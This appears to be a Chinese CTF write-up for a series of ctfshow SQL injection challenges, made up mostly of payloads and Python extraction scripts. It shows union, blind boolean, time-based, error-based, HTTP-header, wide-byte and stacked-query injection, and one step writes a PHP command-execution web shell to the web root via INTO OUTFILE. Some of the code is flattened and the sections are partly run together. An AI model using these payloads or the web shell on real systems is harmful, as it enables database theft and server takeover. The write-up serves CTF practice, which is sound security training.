Please input the ID as parameter with numeric value
GET传一个ID,一开始以为是大写后面发现是小写
?id=-1' union select 1,2,3--+ 有回显2和3
?id=-1' union select 1,2,(select group_concat(schema_name) from information_schema.schemata)--+ 数据库为ctfshow,ctftraining,information_schema,mysql,performance_schema,security,test
?id=-1' union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow')--+ 有一个flag表
?id=-1' union select 1,2,(select group_concat(column_name)from information_schema.columns where table_name='flag')--+ flag字段
?id=-1' union select 1,2,(select flag from ctfshow.flag)--+
web518
#GET数字型union
?id=-1 union select 1,2,3 有回显2和3
?id=-1 union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow') 找到flagaa
?id=-1 union select 1,(select group_concat(column_name)from information_schema.columns where table_name='flagaa'),(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow') flagac字段
?id=-1 union select 1,(select flagac from ctfshow.flagaa),3
web519
#GET单引号括号union
传入引号发现是单引号和括号闭合的
?id=-1')--+
无过滤,正常打就行了
web520
#GET双引号括号union
传入单引号没反应,估计是过滤单引号了
传入一个反斜杠转义一下看看报错
双引号括号闭合
?id=1")--+
也是没过滤的,正常打就行
web521
#GET单引号布尔
单引号闭合,但是没回显执行结果,测一下盲注
?id=1' and 0--+ 无回显 ?id=1' and 1--+ 回显You are in...........
url = "http://f8b07768-2709-42d1-854d-e9285a4e3f31.challenge.ctf.show/" i = 0 target = ""
whileTrue: i += 1 head = 32 tail = 127 while head < tail: mid = (head + tail) // 2 #payload =f"?id=1' and if(ascii(substr((select group_concat(schema_name)from information_schema.schemata),{i},1))>{mid},1,0)%23" #payload = f"?id=1' and if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema='ctfshow'),{i},1))>{mid},1,0)--+" #payload = f"?id=1' and if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flagpuck'),{i},1))>{mid},1,0)--+" payload = f"?id=1' and if(ascii(substr((select flag33 from ctfshow.flagpuck),{i},1))>{mid},1,0)--+"
r = requests.get(url=url+payload) if"You are in..........."in r.text: head = mid + 1 else : tail = mid if head != 32: target += chr(head) print(target) else : break print(target)
url = "http://0f955bc4-8f20-4bf7-8a70-f26b9ffda870.challenge.ctf.show/" i = 0 target = ""
whileTrue: i += 1 head = 32 tail = 127 while head < tail: mid = (head + tail) // 2 #payload =f"?id=1\" and if(ascii(substr((select group_concat(schema_name)from information_schema.schemata),{i},1))>{mid},1,0)%23" #payload = f"?id=1\" and if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema='ctfshow'),{i},1))>{mid},1,0)--+" #payload = f"?id=1\" and if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flagpa'),{i},1))>{mid},1,0)--+" payload = f"?id=1\" and if(ascii(substr((select flag3a3 from ctfshow.flagpa),{i},1))>{mid},1,0)--+"
r = requests.get(url=url+payload) if"You are in..........."in r.text: head = mid + 1 else : tail = mid if head != 32: target += chr(head) print(target) else : break print(target)
?id=1')) union select 1,user(),version() into outfile '/var/www/html/3.txt'--+
成功传入输出
看到语言版本是php5.6的,看看能不能写php文件
?id=1')) union select 1,2,'<?php phpinfo();?>' into outfile '/var/www/html/shell.php'--+
看来是可以写的,那我们直接写个马子
?id=1')) union select 1,2,'<?php system($_GET[1]);?>' into outfile '/var/www/html/shell1.php'--+
但是好像flag不在文件中还是在数据库中,大意了。。。
那就正常查询然后输出到文件吧
?id=1')) union select -1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow') into outfile '/var/www/html/1.txt'--+
?id=-1')) union select 1,2,(select group_concat(column_name)from information_schema.columns where table_name='flagdk') into outfile '/var/www/html/2.txt'--+
?id=-1')) union select 1,2,(select flag43 from ctfshow.flagdk) into outfile '/var/www/html/4.txt'--+
url = "http://d0872a9a-8aae-42f8-8ba0-a04604efe962.challenge.ctf.show/" i = 0 target = ""
whileTrue: i += 1 head = 32 tail = 127 while head < tail: mid = (head + tail) // 2 #payload =f"?id=-1' or if(ascii(substr((select group_concat(schema_name)from information_schema.schemata),{i},1))>{mid},1,0)%23" #payload = f"?id=-1' or if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema='ctfshow'),{i},1))>{mid},1,0)--+" #payload = f"?id=-1' or if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flagjugg'),{i},1))>{mid},1,0)--+" payload = f"?id=-1' or if(ascii(substr((select flag423 from ctfshow.flagjugg),{i},1))>{mid},1,0)--+"
r = requests.get(url=url+payload) if"You are in..........."in r.text: head = mid + 1 else : tail = mid if head != 32: target += chr(head) print(target) else : break print(target)
url = "http://cec0fddc-870f-47da-bc4e-cbf1e9707bfe.challenge.ctf.show/" i = 0 target = ""
whileTrue: i += 1 head = 32 tail = 127
while head < tail: mid = (head + tail) // 2 #payload = f"?id=1' and if(ascii(substr((select group_concat(schema_name)from information_schema.schemata),{i},1))>{mid},sleep(2),0)--+" #payload = f"?id=1' and if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema='ctfshow'),{i},1))>{mid},sleep(2),0)--+" #payload = f"?id=1' and if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flagug'),{i},1))>{mid},sleep(2),0)--+" payload = f"?id=1' and if(ascii(substr((select flag4a23 from ctfshow.flagug),{i},1))>{mid},sleep(2),0)--+"
start = time.time() r = requests.get(url + payload) end = time.time() - start
if end > 1.5 : head = mid + 1 else : tail = mid if head != 32 : target += chr(head) print(target) else : break print(target)
url = "http://febcd613-15f2-442e-b978-a02b307d2f73.challenge.ctf.show/" i = 0 target = ""
whileTrue: i += 1 head = 32 tail = 127
while head < tail: mid = (head + tail) // 2 #payload = f"?id=1\" and if(ascii(substr((select group_concat(schema_name)from information_schema.schemata),{i},1))>{mid},sleep(2),0)--+" #payload = f"?id=1\" and if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema='ctfshow'),{i},1))>{mid},sleep(2),0)--+" #payload = f"?id=1\" and if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flagugs'),{i},1))>{mid},sleep(2),0)--+" payload = f"?id=1\" and if(ascii(substr((select flag43s from ctfshow.flagugs),{i},1))>{mid},sleep(2),0)--+"
start = time.time() r = requests.get(url + payload) end = time.time() - start
if end > 1.5 : head = mid + 1 else : tail = mid if head != 32 : target += chr(head) print(target) else : break print(target)
web527
#POST字符型union
这次的话是post传参,先测一下注入点,发现两个都可以注入
passwd=1'or '1'='1'--+&submit=Submit&uname=1
然后正常联合注入就行了
passwd=1&submit=Submit&uname=1' union select 1,(select group_concat(schema_name)from information_schema.schemata)--+
passwd=1&submit=Submit&uname=1' union select 1,(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow')--+
passwd=1&submit=Submit&uname=1' union select 1,(select group_concat(column_name)from information_schema.columns where table_name='flagugsd')--+
passwd=1&submit=Submit&uname=1' union select 1,(select flag43s from ctfshow.flagugsd)--+
web528
#POST双引号括号union
这次是双引号括号闭合的,也是一样直接打就行
web529
#POST单引号括号盲注
测出来是单引号括号,但是没回显执行结果
passwd=1&submit=Submit&uname=1') or '1'='1'--+
我发现这题可以打盲注也可以打报错注入,貌似前面的题也是可以打报错注入的
报错注入
passwd=1&submit=Submit&uname=1') or (select updatexml(1,concat(0x7e,(database()),0x7e),1))--+
回显
XPATH syntax error: '~security~'
打盲注吧
passwd=1&submit=Submit&uname=1') or if(1<2,1,0)--+
我发现有一个问题
#关于解码问题
如果我们在web页面采用表单提交的话
uname=1') or if(ascii(substr((select group_concat(schema_name)from information_schema.schemata),1,1))>1,1,0)--+
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
所以插入语句
User-Agent: ' and updatexml(1,concat(0x7e,(version()),0x7e),1) and '
成功注入并产生报错
那我们继续打就行
' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow'),0x7e),1) and '
' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='flag'),0x7e),1) and '
' and updatexml(1,concat(0x7e,left((select flag4 from ctfshow.flag),30),0x7e),1) and ' ' and updatexml(1,concat(0x7e,right((select flag4 from ctfshow.flag),30),0x7e),1) and '
至于这里前面的单引号,去掉传进去看到语法错误就知道为什么了
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '', '172.12.23.142')' at line 1
其实也就是根据语句中UA头用单引号包裹做的一个闭合操作,后面的话也可以直接用#注释掉
web535
#Referer头单引号报错注入
传入弱口令登录后返回Referer头信息,尝试打报错注入
' and updatexml(1,concat(0x7e,(select version()),0x7e),1) and '
那就直接打
' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow'),0x7e),1) and '
' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='flag'),0x7e),1) and '
' and updatexml(1,concat(0x7e,left((select flag4 from ctfshow.flag),30),0x7e),1) and ' ' and updatexml(1,concat(0x7e,right((select flag4 from ctfshow.flag),30),0x7e),1) and '
web536
#Cookie头单引号报错注入
传入admin/admin弱口令后返回cookie信息
那我们对当前Cookie的uname进行注入
uname=admin' and updatexml(1,concat(0x7e,(select version()),0x7e),1)#
然后注入就行了
uname=admin' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow'),0x7e),1)#
uname=admin' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='flag'),0x7e),1)#
uname=admin' and updatexml(1,concat(0x7e,left((select flag4 from ctfshow.flag),30),0x7e),1)# uname=admin' and updatexml(1,concat(0x7e,right((select flag4 from ctfshow.flag),30),0x7e),1)#
?id=-1'||extractvalue(1,concat(0x7e,(select group_concat(table_name)from infoorrmation_schema.tables where table_schema='ctfshow'),0x7e))--+
?id=-1'||extractvalue(1,concat(0x7e,(select group_concat(column_name)from infoorrmation_schema.columns where table_name='flags'),0x7e))--+
?id=-1'||extractvalue(1,concat(0x7e,left((select flag4s from ctfshow.flags),30),0x7e))--+ ?id=-1'||extractvalue(1,concat(0x7e,right((select flag4s from ctfshow.flags),30),0x7e))--+
uname=%df'union select 1,(select flag4s from ctfshow.flags)--+&passwd=1&submit=Submit
web555
#数字型的注入
这次虽然转义了,但是不影响我们数字型的注入
?id=0 or 1=1
然后直接打就行
?id=0 union select 1,2,(select flag4s from ctfshow.flags)
如果在查询语句中需要用引号来指明数据库名或表名的话,可以用子查询语句表示字符串
union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=(select schema_name from information_schema.schemata limit 1))
?id=-1%df' union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=(select schema_name from information_schema.schemata limit 1))--+
?id=-1%df' union select 1,2,(select group_concat(column_name)from information_schema.columns where table_name=(select table_name from information_schema.tables limit 1))--+
?id=-1%df' union select 1,2,(select flag4s from ctfshow.flags)--+
# id 参数直接带入到 SQL 语句中 $id=$_GET['id']; $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; if (mysqli_multi_query($con1, $sql)): 输出查询信息 else: print_r(mysqli_error($con1));
?id=20';insert into users(id,username,password) values (20,(select user()),"test")--+ ?id=20
需要传两次,第一次是执行插入语句,第二次是查询
说明这里是可以进行堆叠注入的(源码用的是 mysqli_multi_query,会把分号后的语句一起执行),那我们将注入的语句得到的结果插入表中
insert into插入语句是不能覆盖原有数据的,所以id得一直改新的
?id=1';insert into users(id,username,password) values (21,(select version()),"test")--+
?id=1';insert into users(id,username,password) values (22,(select group_concat(schema_name)from information_schema.schemata),"test")--+
?id=1';insert into users(id,username,password) values (24,(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow'),"test")--+
?id=1';insert into users(id,username,password) values (26,(select group_concat(column_name)from information_schema.columns where table_name='flags'),"test")--+
?id=1';insert into users(id,username,password) values (27,(select group_concat(flag4s) from ctfshow.flags),"test")--+
不知道为什么,在爆flag和数据库的时候爆不出来,后面只能打联合注入了
?id=-1' union select 1,2,(select flag4s from ctfshow.flags)--+
web559
#数字型联合注入
直接打联合注入吧
?id=-1 union select 1,2,(select flag4s from ctfshow.flags)
web560
#单引号括号联合注入
?id=0') union select 1,2,3--+
和之前的相比只是闭合方式
?id=0') union select 1,2,(select flag4s from ctfshow.flags)--+
/?sort=1'and updatexml(1,concat(0x7e,(select flag4s from ctfshow.flags),0x7e),1)--+ /?sort=1'and updatexml(1,concat(0x7e,right((select flag4s from ctfshow.flags),30),0x7e),1)--+